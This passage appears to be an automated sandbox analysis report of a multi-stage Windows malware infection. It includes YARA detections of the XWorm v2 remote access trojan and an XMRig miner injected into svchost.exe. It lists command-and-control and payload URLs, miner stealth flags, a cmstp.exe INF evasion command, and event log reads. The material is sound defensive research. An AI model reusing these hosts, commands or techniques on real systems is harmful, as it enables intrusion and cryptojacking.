                          Source: e44fda3216.exe, 0000000B.00000003.2388530393.0000000005375000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                          Source: e44fda3216.exe, 0000000B.00000003.2420906180.000000000535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                          Source: e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: e44fda3216.exe, 0000000B.00000003.2420906180.000000000535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                          Source: e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: e44fda3216.exe, 0000000B.00000003.2419436378.0000000005464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                          Source: e44fda3216.exe, 0000000B.00000003.2419436378.0000000005464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                          Source: e44fda3216.exe, 0000000B.00000003.2419436378.0000000005464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                          Source: e44fda3216.exe, 0000000B.00000003.2419436378.0000000005464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: e44fda3216.exe, 0000000B.00000003.2419436378.0000000005464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: svchost.exe, 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                          Source: Ele.exe, 00000009.00000002.3318620989.0000000003656000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.ple
                          Source: svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3315665185.0000022087A13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.p
                          Source: Ele.exe, 00000009.00000002.3318620989.0000000003646000.00000004.00000800.00020000.00000000.sdmp, Ele.exe, 00000009.00000002.3318620989.0000000003101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page
                          Source: svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3317388206.0000022087A6A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2502198822.0000022087A6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txt
                          Source: svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txt--cinit-stealth-targets=Taskmgr.exe
                          Source: svchost.exe, 00000035.00000002.3326027564.0000022088243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txtP
                          Source: svchost.exe, 00000035.00000003.2524505739.000002208828E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txtRunning
                          Source: svchost.exe, 00000035.00000003.2502198822.0000022087A6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txtTaskmgr.exe
                          Source: svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2502198822.0000022087A6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.php
                          Source: svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.php--cinit-version=3.4.1--nicehash
                          Source: svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.php6
                          Source: svchost.exe, 00000035.00000002.3317800557.0000022087A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.phpll
                          Source: svchost.exe, 00000035.00000003.2538990041.000002208826A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3336245903.0000022088266000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.phpot
                          Source: svchost.exe, 00000035.00000003.2502198822.0000022087A6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.phpvohvtbtkkqqpcgvy
                          Source: Ele.exe, 00000009.00000002.3318620989.000000000326A000.00000004.00000800.00020000.00000000.sdmp, Ele.exe, 00000009.00000002.3318620989.0000000003101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/98.exe

                          Spam, unwanted Advertisements and Ransom Demands

                          barindex
                          Reads the Security eventlog
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                          Reads the System eventlog
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: 20.0.NzL6O1Q.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm v2 samples based on characteristic strings Author: Sekoia.io
                          Source: 53.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 53.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 53.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: Process Memory Space: svchost.exe PID: 6596, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, type: DROPPEDMatched rule: Finds XWorm v2 samples based on characteristic strings Author: Sekoia.io
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe, type: DROPPEDMatched rule: Finds XWorm v2 samples based on characteristic strings Author: Sekoia.io
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe, type: DROPPEDMatched rule: Finds XWorm v2 samples based on characteristic strings Author: Sekoia.io
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe, type: DROPPEDMatched rule: Finds XWorm v2 samples based on characteristic strings Author: Sekoia.io
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe, type: DROPPEDMatched rule: Finds XWorm v2 samples based on characteristic strings Author: Sekoia.io
                          .NET source code contains very large strings
                          Source: NzL6O1Q[1].exe.5.dr, Settings.csLong String: Length: 32327
                          Source: NzL6O1Q[1].exe.5.dr, Settings.csLong String: Length: 32327
                          Source: NzL6O1Q[1].exe.5.dr, Settings.csLong String: Length: 32327
                          Source: NzL6O1Q[1].exe.5.dr, BankAccount.csLong String: Length: 32327
                          Source: NzL6O1Q[1].exe.5.dr, BankAccount.csLong String: Length: 32327
                          Source: NzL6O1Q[1].exe.5.dr, BankAccount.csLong String: Length: 32327
                          Source: NzL6O1Q[1].exe.5.dr, BankAccount.csLong String: Length: 32327
                          Source: NzL6O1Q[1].exe.5.dr, BankAccount.csLong String: Length: 32327
                          Source: NzL6O1Q[1].exe.5.dr, Person.csLong String: Length: 32327
                          Source: NzL6O1Q.exe.5.dr, Settings.csLong String: Length: 32327
                          Source: NzL6O1Q.exe.5.dr, Settings.csLong String: Length: 32327
                          Source: NzL6O1Q.exe.5.dr, Settings.csLong String: Length: 32327
                          Source: NzL6O1Q.exe.5.dr, BankAccount.csLong String: Length: 32327
                          Source: NzL6O1Q.exe.5.dr, BankAccount.csLong String: Length: 32327
                          Source: NzL6O1Q.exe.5.dr, BankAccount.csLong String: Length: 32327
                          Source: NzL6O1Q.exe.5.dr, BankAccount.csLong String: Length: 32327
                          Source: NzL6O1Q.exe.5.dr, BankAccount.csLong String: Length: 32327
                          Source: NzL6O1Q.exe.5.dr, Person.csLong String: Length: 32327
                          Source: NzL6O1Q.exe.20.dr, Settings.csLong String: Length: 32327
                          Source: NzL6O1Q.exe.20.dr, Settings.csLong String: Length: 32327
                          Source: NzL6O1Q.exe.20.dr, Settings.csLong String: Length: 32327
                          Source: NzL6O1Q.exe.20.dr, BankAccount.csLong String: Length: 32327
                          Source: NzL6O1Q.exe.20.dr, BankAccount.csLong String: Length: 32327
                          Source: NzL6O1Q.exe.20.dr, BankAccount.csLong String: Length: 32327
                          Source: NzL6O1Q.exe.20.dr, BankAccount.csLong String: Length: 32327
                          Source: NzL6O1Q.exe.20.dr, BankAccount.csLong String: Length: 32327
                          Source: NzL6O1Q.exe.20.dr, Person.csLong String: Length: 32327
                          Source: NzL6O1Q.exe0.20.dr, Settings.csLong String: Length: 32327
                          Source: NzL6O1Q.exe0.20.dr, Settings.csLong String: Length: 32327
                          Source: NzL6O1Q.exe0.20.dr, Settings.csLong String: Length: 32327
                          Source: NzL6O1Q.exe0.20.dr, BankAccount.csLong String: Length: 32327
                          Source: NzL6O1Q.exe0.20.dr, BankAccount.csLong String: Length: 32327
                          Source: NzL6O1Q.exe0.20.dr, BankAccount.csLong String: Length: 32327
                          Source: NzL6O1Q.exe0.20.dr, BankAccount.csLong String: Length: 32327
                          Source: NzL6O1Q.exe0.20.dr, BankAccount.csLong String: Length: 32327
                          Source: NzL6O1Q.exe0.20.dr, Person.csLong String: Length: 32327
                          PE file contains section with special chars
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: .idata
                          Source: random[1].exe.5.drStatic PE information: section name:
                          Source: random[1].exe.5.drStatic PE information: section name: .idata
                          Source: random[1].exe.5.drStatic PE information: section name:
                          Source: 718e743381.exe.5.drStatic PE information: section name:
                          Source: 718e743381.exe.5.drStatic PE information: section name: .idata
                          Source: 718e743381.exe.5.drStatic PE information: section name:
                          Source: random[2].exe.5.drStatic PE information: section name:
                          Source: random[2].exe.5.drStatic PE information: section name: .idata
                          Source: random[2].exe.5.drStatic PE information: section name:
                          Source: 739ad26354.exe.5.drStatic PE information: section name:
                          Source: 739ad26354.exe.5.drStatic PE information: section name: .idata
                          Source: 739ad26354.exe.5.drStatic PE information: section name:
                          Source: random[1].exe1.5.drStatic PE information: section name:
                          Source: random[1].exe1.5.drStatic PE information: section name: .idata
                          Source: random[1].exe1.5.drStatic PE information: section name:
                          Source: e44fda3216.exe.5.drStatic PE information: section name:
                          Source: e44fda3216.exe.5.drStatic PE information: section name: .idata
                          Source: e44fda3216.exe.5.drStatic PE information: section name:
                          Uses powercfg.exe to modify the power settings
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0041CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,5_2_0041CB97
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeFile created: C:\Windows\TEMP\aodefromlpug.sys
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E978BB0_2_00E978BB
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E988600_2_00E98860
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E970490_2_00E97049
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E931A80_2_00E931A8
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E54B300_2_00E54B30
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E54DE00_2_00E54DE0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E92D100_2_00E92D10
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9779B0_2_00E9779B
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E87F360_2_00E87F36
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_004470491_2_00447049
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_004488601_2_00448860
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_004478BB1_2_004478BB
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_004431A81_2_004431A8
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00404B301_2_00404B30
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00442D101_2_00442D10
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00404DE01_2_00404DE0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00437F361_2_00437F36
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_0044779B1_2_0044779B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0040E5305_2_0040E530
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_004261925_2_00426192
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_004488605_2_00448860
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00404B305_2_00404B30
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00442D105_2_00442D10
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00404DE05_2_00404DE0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00420E135_2_00420E13
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_004470495_2_00447049
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_004431A85_2_004431A8
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_004216025_2_00421602
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0044779B5_2_0044779B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_004478BB5_2_004478BB
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00423DF15_2_00423DF1
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00437F365_2_00437F36
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeCode function: 6_2_009BD6646_2_009BD664
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CC1011_3_0534CC10
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CAFB11_3_0534CAFB
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CAFB11_3_0534CAFB
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534E5EA11_3_0534E5EA
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CAFB11_3_0534CAFB
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534E5EA11_3_0534E5EA
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0061632311_3_00616323
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0061632311_3_00616323
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0061632311_3_00616323
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0061632311_3_00616323
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0061632311_3_00616323
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0061632311_3_00616323
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0061632311_3_00616323
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0061632311_3_00616323
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0061632311_3_00616323
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0061632311_3_00616323
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0061632311_3_00616323
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0061632311_3_00616323
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe B2ACD91FDCEF767FA027519E3BE0F61CE027C8BDF57027E2C161257DFA5D6543
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00E680C0 appears 130 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0041DF80 appears 63 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0041D942 appears 83 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0041D663 appears 39 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0041D64E appears 66 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00417A00 appears 38 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 004180C0 appears 263 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00438E10 appears 35 times
                          Source: zjFtdxQ[1].exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: zjFtdxQ.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: zjFtdxQ.tmp.12.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                          Source: zjFtdxQ.tmp.12.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                          Source: zjFtdxQ.tmp.14.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                          Source: zjFtdxQ.tmp.14.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                          Source: is-4SN19.tmp.15.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                          Source: is-4SN19.tmp.15.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                          Source: is-VSE52.tmp.15.drStatic PE information: Number of sections : 11 > 10
                          Source: Ele.exe.6.drStatic PE information: No import functions for PE file found
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess created: C:\Windows\SysWOW64\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Users\user\Sys.inf
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess created: C:\Windows\SysWOW64\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Users\user\Sys.infJump to behavior
                          Source: 20.0.NzL6O1Q.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v2 author = Sekoia.io, description = Finds XWorm v2 samples based on characteristic strings, creation_date = 2022-11-07, classification = TLP:CLEAR, version = 1.0, reference = https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/, id = 6cf06f52-0337-415d-8f29-f63d67e228f8
                          Source: 53.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 53.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 53.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: Process Memory Space: svchost.exe PID: 6596, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, type: DROPPEDMatched rule: rat_win_xworm_v2 author = Sekoia.io, description = Finds XWorm v2 samples based on characteristic strings, creation_date = 2022-11-07, classification = TLP:CLEAR, version = 1.0, reference = https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/, id = 6cf06f52-0337-415d-8f29-f63d67e228f8
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe, type: DROPPEDMatched rule: rat_win_xworm_v2 author = Sekoia.io, description = Finds XWorm v2 samples based on characteristic strings, creation_date = 2022-11-07, classification = TLP:CLEAR, version = 1.0, reference = https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/, id = 6cf06f52-0337-415d-8f29-f63d67e228f8
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe, type: DROPPEDMatched rule: rat_win_xworm_v2 author = Sekoia.io, description = Finds XWorm v2 samples based on characteristic strings, creation_date = 2022-11-07, classification = TLP:CLEAR, version = 1.0, reference = https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/, id = 6cf06f52-0337-415d-8f29-f63d67e228f8
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe, type: DROPPEDMatched rule: rat_win_xworm_v2 author = Sekoia.io, description = Finds XWorm v2 samples based on characteristic strings, creation_date = 2022-11-07, classification = TLP:CLEAR, version = 1.0, reference = https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/, id = 6cf06f52-0337-415d-8f29-f63d67e228f8
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe, type: DROPPEDMatched rule: rat_win_xworm_v2 author = Sekoia.io, description = Finds XWorm v2 samples based on characteristic strings, creation_date = 2022-11-07, classification = TLP:CLEAR, version = 1.0, reference = https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/, id = 6cf06f52-0337-415d-8f29-f63d67e228f8
                          Source: Ele.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: random[1].exe.5.drStatic PE information: Section: irrkukjx ZLIB complexity 0.9901571072769275
                          Source: 718e743381.exe.5.drStatic PE information: Section: irrkukjx ZLIB complexity 0.9901571072769275
                          Source: random[2].exe.5.drStatic PE information: Section: hasiulpx ZLIB complexity 0.9946923616136035
                          Source: 739ad26354.exe.5.drStatic PE information: Section: hasiulpx ZLIB complexity 0.9946923616136035
                          Source: random[1].exe1.5.drStatic PE information: Section: ZLIB complexity 0.997758205581761
                          Source: random[1].exe1.5.drStatic PE information: Section: ulxuyjiv ZLIB complexity 0.9940901949802552
                          Source: e44fda3216.exe.5.drStatic PE information: Section: ZLIB complexity 0.997758205581761
                          Source: e44fda3216.exe.5.drStatic PE information: Section: ulxuyjiv ZLIB complexity 0.9940901949802552
                          Source: skotes.exe.0.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                          Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                          Source: NzL6O1Q[1].exe.5.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
